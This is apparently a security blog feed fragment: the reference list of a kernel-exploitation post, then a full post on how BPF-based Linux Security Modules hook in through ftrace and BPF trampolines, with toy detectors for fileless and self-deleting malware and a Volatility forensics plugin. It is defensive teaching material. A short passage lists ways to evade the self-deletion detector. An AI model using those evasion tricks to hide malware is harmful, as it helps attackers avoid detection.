<p>[17] https://www.kernel.org/doc/Documentation/vm/slub.txt</p>

<p>[18] https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html</p>

<p>[19] https://lwn.net/Articles/793427/</p>

<p>[20] https://etenal.me/archives/1825</p>

<p>[21] https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html</p>

<p>[22] https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</p>

<p>[23] https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html</p>

<p>[24] https://github.com/sefcom/KHeaps</p>

<p>[25] https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html</p>

<p>[26] https://docs.google.com/document/d/1a9uUAISBzw3ur1aLQqKc5JOQLaJYiOP5pe_B4xCT1KA/edit#heading=h.nqnduhrd5gpk</p>

<p>[27] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</p>

<p>[28] https://man7.org/linux/man-pages/man2/poll.2.html</p>

<p>[29] https://zplin.me/papers/ELOISE.pdf</p>

<p>[30] https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload</p>

<p>[31] https://man7.org/linux/man-pages/man7/keyrings.7.html</p>

<p>[32] https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L171</p>

<p>[33] https://duasynt.com/blog/linux-kernel-heap-spray</p>

<p>[34] https://elixir.bootlin.com/linux/v5.10.127/source/fs/xattr.c#L511</p>

<p>[35] https://man7.org/linux/man-pages/man7/xattr.7.html</p>

<p>[36] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L350C2-L362C18</p>

<p>[37] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L365C1-L383C1</p>

<p>[38] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L294</p>

<p>[39] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/libexp/poll_stuff.c#L124</p>

<p>[40] https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html</p>

<p>[41] https://elixir.bootlin.com/linux/v5.10.127/source/drivers/tty/pty.c#L811</p>

<p>[42] https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html</p>

<p>[43] https://github.com/smallkirby/kernelpwn/blob/master/technique/tty_struct.md</p>

<p>[44] https://elixir.bootlin.com/linux/v5.10.127/source/mm/vmalloc.c#L2478</p>]]></content><author><name></name></author><summary type="html"><![CDATA[About a year ago, I remember watching a video series by LiveOverflow, a security researcher with a well-known Youtube channel, on him “getting into” browser exploitation [0]. Don’t ask me about any technical details, but what stuck with me is the way he describes how this video series came about; He reflects that he had been interested in the topic for quite a while, regularly annoying experienced researcher with the typical beginner question: “How do I get into it?”, but always just shying away from actually committing to leaning about it - thinking that the topic was too complex, the entry barrier to high.]]></summary></entry><entry><title type="html">LSMs Jmp’ing on BPF Trampolines</title><link href="https://blog.eb9f.de/2023/04/24/lsm2bpf.html" rel="alternate" type="text/html" title="LSMs Jmp’ing on BPF Trampolines" /><published>2023-04-24T00:00:00+00:00</published><updated>2023-04-24T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/04/24/lsm2bpf</id><content type="html" xml:base="https://blog.eb9f.de/2023/04/24/lsm2bpf.html"><![CDATA[<p>Back in 2001, the Linux Security Module (LSM) subsystem made its way
into the mainline kernel. Almost 10 years ago, in September 2014, the
modern BPF virtual machine (VM) landed in the tree. In late 2019, KP Singh
proposed a patchset that facilitates the creation of modules for the
former that run on the latter - Kernel Runtime Security Instrumentation
(KRSI) was born.</p>

<p>But how does kernel control flow transfer in and out of the VM at the
security checkpoints? Originally, this question was raised while
developing a memory forensics tool for detecting BPF-based malware,
but it quickly became a great learning experience about the internals
of the two subsystems. In this post, we will seek an answer to
that first question, and then use it to develop the module that detects such hooks in memory images.</p>

<p>However, before we jump into assembly code, let’s briefly recap on LSMs
and BPF.</p>

<h3 id="linux-security-modules">Linux Security Modules</h3>
<p>By default, Linux implements
<a href="https://en.wikipedia.org/wiki/Discretionary_access_control">discretionary access control</a>.
For example, the owner of a resource is free to grant others access
to it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chmod 444 .ssh/id_rsa
</code></pre></div></div>
<p>This is potentially problematic, e.g., on multi-user systems where
users have different security clearances. To implement other access
control policies, e.g.,
<a href="https://en.wikipedia.org/wiki/Mandatory_access_control">mandatory access control</a>,
organizations like the National Security Agency (NSA) had to maintain
their own kernel patches.</p>

<p>At the <a href="https://lwn.net/2001/features/KernelSummit/">2001 Kernel Summit</a>
in San Jose, California, the NSA’s Peter
Loscocco presented their Security Enhanced Linux (SELinux); but the
patchset was not merged. However, one year later at the
<a href="https://lwn.net/Articles/3467/">Kernel Summit in Ottawa</a>,
Chris Wright presented the patch that should later become the Linux
Security Module subsystem.</p>

<p>Citing its documentation:</p>
<blockquote>
  <p>The LSM framework includes security fields in kernel data structures
and calls to hook functions at critical points in the kernel code to
manage the security fields and to perform access control. It also adds
functions for registering security modules. An interface
/sys/kernel/security/lsm reports a comma separated list of security
modules that are active on the system.
<a href="https://docs.kernel.org/security/lsm.html">link</a></p>
</blockquote>

<p>The framework is intended to be generic enough to facilitate enforcing
of a wide range of security policies by writing a kernel module that
uses those two primitives. But writing kernel modules is hard,
mistakes might have catastrophic consequences, and the binary blobs only
run on the kernel they were compiled for - but fortunately there is…</p>

<p>Further reading:
<a href="https://www.usenix.org/conference/11th-usenix-security-symposium/linux-security-modules-general-security-support-linux">Linux Security Modules: General Security Support for the Linux Kernel</a></p>

<h3 id="modern-bpf">Modern BPF</h3>
<p>BPF is a VM inside the Linux kernel. It is used for
running programs in a sandboxed environment within the kernel context.</p>

<p>Programs can be written in C, Rust or even high-level scripting
languages. They are compiled to BPF bytecode, which can be dynamically
loaded into the kernel where it is statically verified before being
compiled to native code. Thus, running BPF programs is safe, in the
sense that a programming mistake won’t crash your kernel, as well as
low overhead. Furthermore, type information included in modern kernels
is used to relocate programs before loading, eliminating the need for
compilation on the target system.</p>

<p>By now, the VM is used in many different kernel subsystems, like
networking, tracing, security, cgroups or scheduling. In an effort to
provide a safer kernel programming environment, it is actively being
extended with new features.</p>

<p>Further reading:
<a href="https://docs.cilium.io/en/latest/bpf/">BPF and XDP Reference Guide</a></p>

<h3 id="kernel-runtime-security-instrumentation-krsi">Kernel Runtime Security Instrumentation (KRSI)</h3>
<p><a href="https://patchwork.kernel.org/project/linux-security-module/cover/20200329004356.27286-1-kpsingh@chromium.org/">This patchset</a>
added the option to implement the security callbacks
as programs for the BPF VM. For illustration purposes,
we are going to use a very simple security module that aims to detect
and prevent two common malware behaviors. You can find the full source
code <a href="https://github.com/vobst/golb-lsm2bpf/blob/master/mini_lsm.bpf.c">here</a>.</p>

<h4 id="fileless-executions">Fileless Executions</h4>
<p>Using a remote code execution exploit, an attacker might be able to
compromise a process running on a victim’s machine. Downloading and
executing a second stage payload without touching the filesystem might
be desirable due to security measures preventing the creation of (executable)
files or to minimize forensic artifacts. While userland exec is a
well-known technique, it is much more convenient to use Linux’s memfd
API. To detect such events, we can write the following BPF program and
attach it to the <code class="language-plaintext highlighter-rouge">bprm_creds_for_exec</code> security hook.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SEC</span><span class="p">(</span><span class="s">"lsm/bprm_creds_for_exec"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">BPF_PROG</span><span class="p">(</span><span class="n">bprm_creds_for_exec</span> <span class="p">,</span> <span class="k">struct</span> <span class="n">linux_binprm</span><span class="o">*</span> <span class="n">bprm</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">nlink</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">comm</span><span class="p">[</span><span class="n">BPF_MAX_COMM_LEN</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
  <span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">BPF_MAX_PATH_LEN</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

  <span class="n">nlink</span> <span class="o">=</span> <span class="n">bprm</span><span class="o">-&gt;</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_path</span><span class="p">.</span><span class="n">dentry</span><span class="o">-&gt;</span><span class="n">d_inode</span><span class="o">-&gt;</span><span class="n">__i_nlink</span><span class="p">;</span> <span class="c1">// [1]</span>
  <span class="n">bpf_d_path</span><span class="p">(</span><span class="o">&amp;</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_path</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">path</span><span class="p">));</span>

  <span class="n">LOG_INFO</span><span class="p">(</span><span class="s">"path=%s nlink=%d"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">nlink</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nlink</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">bpf_get_current_comm</span><span class="p">(</span><span class="n">comm</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">comm</span><span class="p">));</span>
    <span class="n">LOG_WARN</span><span class="p">(</span><span class="s">"fileless execution (%s:%lu)"</span><span class="p">,</span> <span class="n">comm</span><span class="p">,</span> <span class="n">bpf_ktime_get_boot_ns</span><span class="p">());</span>
    <span class="n">bpf_send_signal</span><span class="p">(</span><span class="n">SIGKILL</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [3]</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This hook is called early during the exec system call and it receives
the file that the process wants to execute.
At [1] we get the number of hard links to this file. If it is zero, we
deny the execution [3] and queue a fatal signal for the process [2].
The latter is necessary since the hook is called before the syscall’s
<em>point-of-no-return</em>, after which all errors are fatal.</p>

<p>Note: You can use the
<a href="https://github.com/vobst/golb-lsm2bpf/blob/master/memfd_exec.c"><code class="language-plaintext highlighter-rouge">memfd_exec</code></a>
program to test this hook. It also allows you to experiment with the
differences between executing a script starting with #! and an ELF binary.</p>

<h4 id="self-deletion">Self-Deletion</h4>
<p>Less sophisticated malware might simply try to go memory-resident by
deleting its executable on disk. We can write another BPF program
and attach it to the <code class="language-plaintext highlighter-rouge">inode_unlink</code> security hook in an attempt to
prevent this behavior.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SEC</span><span class="p">(</span><span class="s">"lsm/inode_unlink"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">BPF_PROG</span><span class="p">(</span><span class="n">inode_unlink</span><span class="p">,</span> <span class="k">struct</span> <span class="n">inode</span><span class="o">*</span> <span class="n">inode_dir</span><span class="p">,</span> <span class="k">struct</span> <span class="n">dentry</span><span class="o">*</span> <span class="n">dentry</span><span class="p">)</span>
<span class="p">{</span>
  <span class="k">struct</span> <span class="n">task_struct</span><span class="o">*</span> <span class="n">current</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">comm</span><span class="p">[</span><span class="n">BPF_MAX_COMM_LEN</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
  <span class="k">const</span> <span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">exe_inode</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">*</span><span class="n">target_inode</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="n">target_inode</span> <span class="o">=</span> <span class="n">dentry</span><span class="o">-&gt;</span><span class="n">d_inode</span><span class="p">;</span> <span class="c1">// [1]</span>

  <span class="n">LOG_INFO</span><span class="p">(</span><span class="s">"target_inode=0x%lx"</span><span class="p">,</span> <span class="n">target_inode</span><span class="p">);</span>

  <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
      <span class="n">current</span> <span class="o">=</span> <span class="n">bpf_get_current_task_btf</span><span class="p">(),</span>
      <span class="n">exe_inode</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">mm</span><span class="o">-&gt;</span><span class="n">exe_file</span><span class="o">-&gt;</span><span class="n">f_inode</span><span class="p">;</span> <span class="c1">// [2]</span>
      <span class="n">exe_inode</span> <span class="o">&amp;&amp;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">BPF_MAX_LOOP_SIZE</span><span class="p">;</span>
       <span class="n">i</span><span class="o">++</span><span class="p">,</span>
      <span class="n">current</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">current</span><span class="p">,</span> <span class="n">parent</span><span class="p">),</span>
      <span class="n">exe_inode</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">current</span><span class="p">,</span> <span class="n">mm</span><span class="p">,</span> <span class="n">exe_file</span><span class="p">,</span> <span class="n">f_inode</span><span class="p">))</span>
  <span class="p">{</span>
    <span class="n">bpf_probe_read_kernel</span><span class="p">(</span><span class="o">&amp;</span><span class="n">comm</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">comm</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">comm</span><span class="p">);</span>
    <span class="n">LOG_INFO</span><span class="p">(</span><span class="s">"exe_inode=0x%lx comm=%s"</span><span class="p">,</span> <span class="n">exe_inode</span><span class="p">,</span> <span class="n">comm</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">target_inode</span> <span class="o">==</span> <span class="n">exe_inode</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [3]</span>
      <span class="n">bpf_get_current_comm</span><span class="p">(</span><span class="n">comm</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">comm</span><span class="p">));</span>
      <span class="n">LOG_WARN</span><span class="p">(</span><span class="s">"self-deletion (%s:%lu)"</span><span class="p">,</span> <span class="n">comm</span><span class="p">,</span> <span class="n">bpf_ktime_get_boot_ns</span><span class="p">());</span>
      <span class="n">bpf_send_signal</span><span class="p">(</span><span class="n">SIGKILL</span><span class="p">);</span>
      <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We attach this program to the <code class="language-plaintext highlighter-rouge">inode_unlink</code> hook, which is called each
time a process attempts to delete a file. The callback receives the
parent directory as well as the directory entry of the file that is to
be deleted. First, the <code class="language-plaintext highlighter-rouge">dentry</code> is used to obtain the underlying inode
[1]. Then, the loop reads the inode of the file that the process (or
any of its ancestors) is executing [2].
Finally, by comparing the two [3] we can attempt to detect
self-deletions.</p>

<p>Note: This program is flawed in many ways.
First, it breaks updates, e.g., when the package manager updates
systemd’s executable. Furthermore, it is easy to bypass, e.g.,</p>
<ul>
  <li>The parent deletes its child’s executable and exits. Then, the child
gets reparented and deletes the parent.</li>
  <li>Schedule removal through another task, e.g., <code class="language-plaintext highlighter-rouge">cron</code> or <code class="language-plaintext highlighter-rouge">systemd</code>.</li>
  <li>Use the <code class="language-plaintext highlighter-rouge">prctl</code> syscall to set the exe file.</li>
  <li>Scripts that are run by an interpreter are unaffected.</li>
  <li>Using <code class="language-plaintext highlighter-rouge">io_uring</code>’s asynchronous unlink requests in combination with a
dedicated kernel thread for processing them <em>might</em> (not tested) also
be an option.</li>
</ul>

<h2 id="bpf-trampolines-the-glue-between-c-and-bpf">BPF Trampolines: The glue between C and BPF</h2>
<p>Now that we got ourselves a small BPF-based security module to play
with, we can examine how it works under the hood.</p>

<h3 id="reaching-the-tramp">Reaching the tramp</h3>
<p>Let’s start by looking at the part of the infrastructure that is
statically compiled into the kernel. Figure 1 gives an overview of
the code path leading up to our BPF program.</p>

<p><img src="/media/lsm2bpf/call_chain_to_tramp.jpg" alt="Figure 1: Call chain leading up to BPF trampoline" /></p>

<p>At selected places, the kernel calls functions starting with
<code class="language-plaintext highlighter-rouge">security_</code>. For example, the <code class="language-plaintext highlighter-rouge">vfs_unlink</code> function calls
<code class="language-plaintext highlighter-rouge">security_inode_unlink</code> and aborts if it returns a nonzero value.
LSM hooks are meant to provide a higher level of abstraction than
system calls; thus it makes sense to pace the gatekeeper call at
a choke point in the virtual file system (VFS) which may operations
must pass, independently of their entry point into the kernel and the
type of object they are operating on.</p>

<p>Each of those call sites has its own member in the global
<code class="language-plaintext highlighter-rouge">security_hook_heads</code> structure. The <code class="language-plaintext highlighter-rouge">security_inode_unlink</code> function
uses its member to traverse a list of all registered callbacks, calling
them one by one. As soon as one of them returns a nonzero value it
aborts and propagates the value back to the caller.</p>

<p>There are numerous ways how we can find out where the indirect calls
lead us. For example, we can use <code class="language-plaintext highlighter-rouge">trace-cmd</code> with the function graph
tracer to record a trace of the functions called during an unlink
system call.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">touch</span> /tmp/hax <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>trace-cmd record <span class="nt">-p</span> function_graph <span class="se">\</span>
<span class="nt">--max-graph-depth</span> 4 <span class="nt">-g</span> do_unlinkat <span class="nt">-n</span> <span class="s2">"*interrupt*"</span> <span class="nt">-n</span> <span class="s2">"*irq*"</span> <span class="se">\</span>
<span class="nt">-n</span> <span class="s2">"capable"</span> <span class="nt">-n</span> <span class="s2">"*__rcu*"</span> <span class="nt">-n</span> <span class="s2">"*_spin_*"</span> <span class="nt">-v</span> <span class="nt">-e</span> <span class="s2">"*irq*"</span> <span class="nt">-e</span> <span class="s2">"*sched*"</span> <span class="se">\</span>
<span class="nt">-F</span> /bin/rm /tmp/hax <span class="se">\</span>
<span class="o">&amp;&amp;</span> trace-cmd report trace.dat <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>trace-cmd reset
...
rm-8004  <span class="o">[</span>011] 17857.021621: funcgraph_entry:                   |      security_inode_unlink<span class="o">()</span> <span class="o">{</span>
rm-8004  <span class="o">[</span>011] 17857.021621: funcgraph_entry:        0.129 us   |        bpf_lsm_inode_unlink<span class="o">()</span><span class="p">;</span>
rm-8004  <span class="o">[</span>011] 17857.021622: funcgraph_exit:         0.436 us   |      <span class="o">}</span>
...
</code></pre></div></div>
<p>Alternatively, we can debug the kernel on a guest VM and set a
breakpoint, e.g., on the function we suspect to be called. Looking at
the backtrace confirms the observation:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
(remote) gef➤  b bpf_lsm_inode_mkdir
Breakpoint 2 at 0xffffffff81230d80: file ./include/linux/lsm_hook_defs.h, line 126.
(remote) gef➤  c
...
(remote) gef➤  bt
#0  bpf_lsm_inode_mkdir (dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at ./include/linux/lsm_hook_defs.h:126
#1  0xffffffff814c56d0 in security_inode_mkdir (dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at security/security.c:1298
#2  0xffffffff8130488e in vfs_mkdir (mnt_userns=0xffffffff82e4e920 &lt;init_user_ns&gt;, dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at fs/namei.c:4029
#3  0xffffffff81304a02 in do_mkdirat (dfd=0xffffff9c, name=0xffff8880075b1000, mode=0x1ed) at fs/namei.c:4061
#4  0xffffffff81304b7d in __do_sys_mkdir (pathname=&lt;optimized out&gt;, mode=&lt;optimized out&gt;) at fs/namei.c:4081
...
</code></pre></div></div>
<p>However, as we can see, the function usually does absolutely nothing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(remote) gef➤  x/5i $rip
=&gt; 0xffffffff81230d80 &lt;bpf_lsm_inode_mkdir&gt;:    endbr64
   0xffffffff81230d84 &lt;bpf_lsm_inode_mkdir+4&gt;:  nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81230d89 &lt;bpf_lsm_inode_mkdir+9&gt;:  xor    eax,eax
   0xffffffff81230d8b &lt;bpf_lsm_inode_mkdir+11&gt;: ret
</code></pre></div></div>
<p>It exists for the sole purpose of being <em>ftrace</em> attachable! You might
have spotted the <code class="language-plaintext highlighter-rouge">nop</code> instruction at the very beginning: this one is
just reserving some space which allows the ftrace framework
to divert control flow by dynamically patching the kernel text.</p>

<p>We can see the patching machinery at work by placing a read-write
watchpoint on the nop’s address before attaching our program. It is hit multiple times during the attachment process, and when everything is
done, the <code class="language-plaintext highlighter-rouge">nop</code> is replaced by a call to a <em>BPF trampoline</em>.</p>

<h3 id="the-tramp">The Tramp</h3>
<p>BPF trampolines are the architecture-dependent glue that connects
native kernel functions to BPF programs. Currently only
<a href="https://elixir.bootlin.com/linux/v6.2.12/source/arch/arm64/net/bpf_jit_comp.c#L1964">arm64</a>
and
<a href="https://elixir.bootlin.com/linux/v6.2.12/source/arch/x86/net/bpf_jit_comp.c#L2128">x86</a>
support the generation of BPF trampolines.
Figures 2 and 3 show the stack frame and code of the generated trampoline,
respectively.</p>

<p><img src="/media/lsm2bpf/tramp_stack_frame.jpg" alt="Figure 2: Stack frame of the trampoline" />
<img src="/media/lsm2bpf/tramp_image.jpg" alt="Figure 3: Trampoline used for attaching LSM programs" /></p>

<p>Some values are burned into the trampoline upon generation; this
includes pointers to its metadata-holding <code class="language-plaintext highlighter-rouge">struct bpf_tramp_image</code>
as well as the <code class="language-plaintext highlighter-rouge">struct bpf_prog</code> of each program it leads up to. Local
variables are stored in the trampolines stack frame, most importantly
the read-only context <code class="language-plaintext highlighter-rouge">ctx</code> received by the BPF programs lives on this
stack.</p>

<p>The execution of the trampoline begins by grabbing a percpu reference to
itself. Probably to indicate to other code which CPUs are currently
using the trampoline.  (Question: Is it really a
percpu ref? Would be strange to get it while migration is enabled.)</p>

<p>Now comes the part where the trampoline calls into the jit-compiled BPF
programs one by one, handing each program a pointer to the stack-allocated
context holding the directory and the directory entry of the file to be
deleted as well as the return value of the previous BPF program.
While a BPF program is running it enters a read-copy-update (RCU) read-side critical
section and disables migration to other CPUs. Optionally, it might also
measure the execution time of the BPF program.</p>

<p>As soon as a program returns a nonzero value, the trampoline stops invoking
other programs and directly goes to its exit routine. Otherwise, it
calls the original function, i.e., <code class="language-plaintext highlighter-rouge">bpf_lsm_inode_unlink</code>, for its
side effects and return value once all BPF programs are finished.</p>

<p>Upon exit, the trampoline drops the ref to itself and returns directly
into the <code class="language-plaintext highlighter-rouge">security_inode_unlink</code> function through an extra lowering of
its stack pointer, propagating either the return value of the last BPF
program or that of the attached function.</p>

<p>Aside:
You probably already guessed that the utility of ftrace and BPF
trampolines are not limited to realizing KRSI.</p>

<p>In fact, we already saw another use of the ftrace framework: it’s the
machinery that drives <code class="language-plaintext highlighter-rouge">trace-cmd</code>. If you’d <code class="language-plaintext highlighter-rouge">strace</code> it, you would see
that it’s doing most of its magic by reading and writing files in
tracefs, the user space interface of ftrace. Furthermore, ftrace can
also be used by kernel modules to install callbacks into their code.</p>

<p>BPF trampolines on the other hand are used to jump into all kinds of
BPF programs, not only LSM-related ones. Numerous flags are
controlling their generation, and the outcome we described above
is just one combination of those. For instance, you could also
generate trampolines that cannot skip the original function and simply
return to it, or trampolines that call BPF programs after the
original function was executed by the trampoline.</p>

<h2 id="digging-through-memory-dumps">Digging Through Memory Dumps</h2>
<p>Now that we are equipped with some background knowledge, we can get back
to the original question:
Given a memory dump of a system can we reconstruct which BPF LSM hooks
were active?</p>

<p>For this part, we’re going to use
<a href="https://github.com/volatilityfoundation/volatility3">Volatility3</a>
as a memory forensics
framework and implement our feature as a plugin.
You can find the source code
<a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_lsm.py">here</a>.
However, the techniques are not tied to a specific framework in any way.</p>

<p>First, we have to find out which hooks are active. For that
purpose we can simply disassemble all the <code class="language-plaintext highlighter-rouge">bpf_lsm_</code> stub functions
and check if their ftrace nops are replaced by a call. This gives us
the active hooks and the corresponding addresses of the executable
trampoline images.</p>

<p>Next, we can figure out which programs belong to a given image. There are
at least two approaches that immediately come to mind: disassemble
the trampolines and extract the compiled-in addresses of the program
code and their corresponding metadata structs, or
query higher-level abstractions like BPF link objects.</p>

<p>While the first approach is less susceptible to anti-forensics it
suffers from dependence on trampoline code generation. Since we already
know which hooks are active it’s safe to look for the program information
at places that are easier to manipulate, like the <code class="language-plaintext highlighter-rouge">link_idr</code> which
contains all BPF link objects in use. If we don’t find a corresponding
program there it’s considered suspicious, and we will raise an alert.</p>

<p>Figure 4 gives an overview of how BPF link objects can be used
to match trampoline images to links. Iterating the <code class="language-plaintext highlighter-rouge">link_idr</code> gives
us <code class="language-plaintext highlighter-rouge">bpf_link</code> objects. The link type maps directly
the type of the container structure. Thus, if it indicates a tracing
link we can pivot to the outer struct and use its <code class="language-plaintext highlighter-rouge">trampoline</code> member to
get the address of the executable trampoline image that the link’s
program is attached to.</p>

<p><img src="/media/lsm2bpf/link_to_tramp.jpg" alt="Figure 4: Matching BPF links to trampolines" /></p>

<p>Putting it all together, we can find all active BPF LSM hooks as well
as all programs attached to them. You can find the full Volatility
plugin code that implements the above approach in our BPF plugin suite
on
<a href="https://github.com/vobst/BPFVol3">GitHub</a>.
Running it against a memory image of a system that uses our toy LSM
correctly reports activity on two hooks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./vol.py -f /io/dumps/mini_lsm_w_dummy.elf -v linux.bpf_lsm
...
LSM HOOK	Nr. PROGS	IDs

bpf_lsm_bprm_creds_for_exec	2	16,18

bpf_lsm_inode_unlink	1	19
</code></pre></div></div>
<p>Note that we have added a second program to <code class="language-plaintext highlighter-rouge">bprm_creds_for_exec</code>
in order to cover the case where more than one program is attached to a
single hook. You can now use the
program IDs with other plugins like <code class="language-plaintext highlighter-rouge">bpf_listprogs</code> to continue your
investigation. The memory image can be downloaded
<a href="https://owncloud.fraunhofer.de/index.php/s/sAXBW6HycFAqbio">here</a>
and the symbols are provided
<a href="https://github.com/vobst/golb-lsm2bpf/blob/master/18c2747e19df38432fbfbdf4ed36921c.isf.json">here</a>.</p>

<h2 id="wrapup">Wrapup</h2>

<p>In this post, we learned about LSMs, a cornerstone of building
high-security Linux systems, and their programmability through modern
BPF. On the way we met two core parts of Linux’s tracing infrastructure:
ftrace and BPF trampolines. In the end, we leveraged this knowledge to
build a memory forensics tool capable of detecting a subtle way in which
malware might infect a system.</p>

<h2 id="references">References</h2>
<p>[1] “Building a Security Tracing Utility To Snoop Into the Linux Kernel.” https://lumontec.com/1-building-a-security-tracing</p>

<p>[2] “ChromeOS: Noexec File System Bypass Using Memfd.” https://bugs.chromium.org/p/chromium/issues/detail?id=916146</p>

<p>[3] “Commit: bpf: Introduce BPF Trampoline.” [Online]. Available: https://github.com/torvalds/linux/commit/fec56f5890d93fc2ed74166c397dc186b1c25951</p>

<p>[4] “eBPF: Block Linux Fileless Payload ‘Malware’ Execution With BPF LSM.” https://djalal.opendz.org/post/ebpf-block-linux-fileless-payload-execution-with-bpf-lsm/</p>

<p>[5] “Elixir: arch/x86 arch_prepare_bpf_trampoline.” [Online]. Available: https://elixir.bootlin.com/linux/latest/source/arch/x86/net/bpf_jit_comp.c#L2128</p>

<p>[6] “FOSDEM 2020: Kernel Runtime Security Instrumentation LSM+BPF=KRSI,” Jan. 02, 2020. [Online]. Available: https://archive.fosdem.org/2020/schedule/event/security_kernel_runtime_security_instrumentation/</p>

<p>[7] “Google Help: retpoline.” [Online]. Available: https://support.google.com/faqs/answer/7625886?hl=en</p>

<p>[8] “KPsingh‘s Kernel Tree.” [Online]. Available: https://github.com/sinkap/linux-krsi/blob/patch/v1/examples/samples/bpf/lsm_detect_exec_unlink.c</p>

<p>[9] “KRSI PATCHv1.” [Online]. Available: https://lwn.net/ml/linux-kernel/20191220154208.15895-1-kpsingh@chromium.org/</p>

<p>[10] “KRSI PATCHv9 (final).” [Online]. Available: https://patchwork.kernel.org/project/linux-security-module/cover/20200329004356.27286-1-kpsingh@chromium.org/</p>

<p>[11] “KRSI RFCv1,” Oct. 09, 2019. [Online]. Available: https://lore.kernel.org/bpf/20190910115527.5235-1-kpsingh@chromium.org/#r</p>

<p>[12] “Linux Security Modules: General Security Support for the Linux Kernel”.</p>

<p>[13] “Linux Security Summit NA 2019: Kernel Runtime Security Instrumentation - KP Singh, Google,” Oct. 02, 2019. [Online]. Available: https://www.youtube.com/watch?v=2CZSSRfgAgQ</p>

<p>[14] “Linux Security Summit NA 2020: KRSI (BPF + LSM) - Updates and Progress - KP Singh, Google,” Jul. 01, 2020. [Online]. Available: https://lssna2020.sched.com/event/c74F/krsi-bpf-lsm-updates-and-progress-kp-singh-google</p>

<p>[15] “LPC 2020: BPF LSM (Updates + Progress),” Aug. 25, 2020. [Online]. Available: https://lpc.events/event/7/contributions/680/</p>

<p>[16] “LWN: bpf: add ambient BPF runtime context stored in current.” https://lwn.net/Articles/862539/</p>

